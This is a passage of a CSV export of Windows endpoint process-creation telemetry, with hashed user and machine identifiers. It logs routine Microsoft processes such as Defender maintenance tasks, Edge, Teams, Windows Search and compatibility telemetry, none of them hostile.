01:10:56.356672500+00:00,2021-06-24 01:13:23.016985900+00:00,ebeab377-1c36-417d-a64a-fc6cdbdea13b,computerpii_0a470890c60768167990033d701e7bd881398861,170165,False,10.7740.19041.1052,False,11540474045175517,,11540474045175520,2021-06-24 01:10:56.284103300+00:00,20516,2021-06-24 01:10:56.284103300+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,20516,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-24 01:01:21.377959+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+708,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:10:56.334789+00:00,19980,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:10:56.302704100+00:00,10852,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdCleanup",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:56.356913+00:00,2021-06-24 01:13:23.017091300+00:00,a4940e3c-4f63-4544-99d2-08bf29182ff1,computerpii_0a470890c60768167990033d701e7bd881398861,170166,False,10.7740.19041.1052,False,11540474045175519,,11540474045175521,2021-06-24 01:10:56.302704100+00:00,10852,2021-06-24 01:10:56.302704100+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,10852,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-24 01:01:21.377959+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+709,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:10:56.355431400+00:00,16016,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:10:56.297118300+00:00,21156,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdCacheMaintenance",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:56.406018600+00:00,2021-06-24 01:13:23.017276900+00:00,53d3c68b-11fc-433e-8882-d18ee1168487,computerpii_0a470890c60768167990033d701e7bd881398861,170168,False,10.7740.19041.1052,False,11540474045175518,,11540474045175522,2021-06-24 01:10:56.297118300+00:00,21156,2021-06-24 01:10:56.297118300+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,21156,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-24 01:01:21.377959+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+710,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:10:56.420633100+00:00,13936,dmclient.exe,dmclient.exe utcwnf,PortableExecutable,2021-02-17 04:34:43.547067+00:00,C:\Windows\System32\dmclient.exe,121344,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:56.493733900+00:00,2021-06-24 01:13:23.017461600+00:00,5c827333-32f6-4f69-b68f-13585f5b8d71,computerpii_0a470890c60768167990033d701e7bd881398861,170170,False,10.7740.19041.1052,False,11540474045136925,,11540474045175523,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client
+711,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:10:56.435402700+00:00,9560,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:10:56.420633100+00:00,13936,dmclient.exe,dmclient.exe utcwnf,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:56.495780300+00:00,2021-06-24 01:13:23.017543100+00:00,74f324a7-e2ae-4e2d-9062-cd4644eb03f7,computerpii_0a470890c60768167990033d701e7bd881398861,170171,False,10.7740.19041.1052,False,11540474045175523,,11540474045175524,2021-06-24 01:10:56.420633100+00:00,13936,2021-06-24 01:10:56.420633100+00:00,\Device\HarddiskVolume3\Windows\System32\dmclient.exe,13936,2176,ActiveProcessStartkey,C:\Windows\System32,121344,2083-12-25 18:01:52+00:00,2021-02-17 04:34:43.549079100+00:00,2021-06-24 01:02:09.745850200+00:00,2021-02-17 04:34:43.547067+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+712,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:11:00.365978400+00:00,10192,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4156 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:11:00.417512300+00:00,2021-06-24 01:13:23.019294200+00:00,ee726c91-a486-49ca-a383-e3fc9e647fe5,computerpii_0a470890c60768167990033d701e7bd881398861,170191,False,10.7740.19041.1052,False,11540474045175158,,11540474045175530,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+713,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:11:00.808659300+00:00,18460,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1040 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:11:00.816930900+00:00,2021-06-24 01:13:23.019460800+00:00,db139464-808a-4faa-8f5f-5cd1464b2fcf,computerpii_0a470890c60768167990033d701e7bd881398861,170193,False,10.7740.19041.1052,False,11540474045175158,,11540474045175532,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+714,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:11:43.408416300+00:00,11252,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320744_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320744 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:11:43.544041300+00:00,2021-06-24 01:13:23.023518300+00:00,f0b2798b-2449-4776-914f-cd64cbc88960,computerpii_0a470890c60768167990033d701e7bd881398861,170233,False,10.7740.19041.1052,False,11540474045144190,,11540474045175537,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+715,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:33.594710300+00:00,20336,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:33.581058600+00:00,11324,powershell.exe,powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';,True,2021-06-24 00:54:21.441083700+00:00,15568,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:33.898422900+00:00,2021-06-24 00:55:36.372434900+00:00,69122758-d064-4a4c-a5a5-f38fdb280caa,computerpii_0a470890c60768167990033d701e7bd881398861,169144,False,10.7740.19041.1052,False,11540474045175326,,11540474045175327,2021-06-24 00:54:33.581058600+00:00,11324,2021-06-24 00:54:33.581058600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,11324,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+716,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:39.179216700+00:00,20456,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADoAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1624 /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:39.208117700+00:00,2021-06-24 00:55:36.373655200+00:00,d5ebed2d-c801-4963-b578-775d9781972d,computerpii_0a470890c60768167990033d701e7bd881398861,169167,False,10.7740.19041.1052,False,11540474045175219,,11540474045175330,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,16512,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+717,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:40.150412400+00:00,1704,CompatTelRunner.exe,CompatTelRunner.exe -m:appraiser.dll -f:UpdateAvStatus -cv:gbdKcilcyUCvVzfm.3,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:21.257173600+00:00,14188,CompatTelRunner.exe,compattelrunner.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:40.227139+00:00,2021-06-24 00:55:36.373758+00:00,f1ed66a0-7929-4a2a-8995-e0f12e695dae,computerpii_0a470890c60768167990033d701e7bd881398861,169169,False,10.7740.19041.1052,False,11540474045175314,,11540474045175331,2021-06-24 00:54:21.257173600+00:00,14188,2021-06-24 00:54:21.257173600+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,14188,18560,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-24 00:54:21.245734700+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+718,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:40.225538+00:00,9244,CompatTelRunner.exe,CompatTelRunner.exe -m:pcasvc.dll -f:QueryEncapsulationSettings -cv:gbdKcilcyUCvVzfm.5,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:21.257173600+00:00,14188,CompatTelRunner.exe,compattelrunner.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:40.632887200+00:00,2021-06-24 00:55:36.373908600+00:00,2bce85b8-0a31-408e-bd06-3288e95813d8,computerpii_0a470890c60768167990033d701e7bd881398861,169172,False,10.7740.19041.1052,False,11540474045175314,,11540474045175332,2021-06-24 00:54:21.257173600+00:00,14188,2021-06-24 00:54:21.257173600+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,14188,16512,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-24 00:54:21.245734700+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
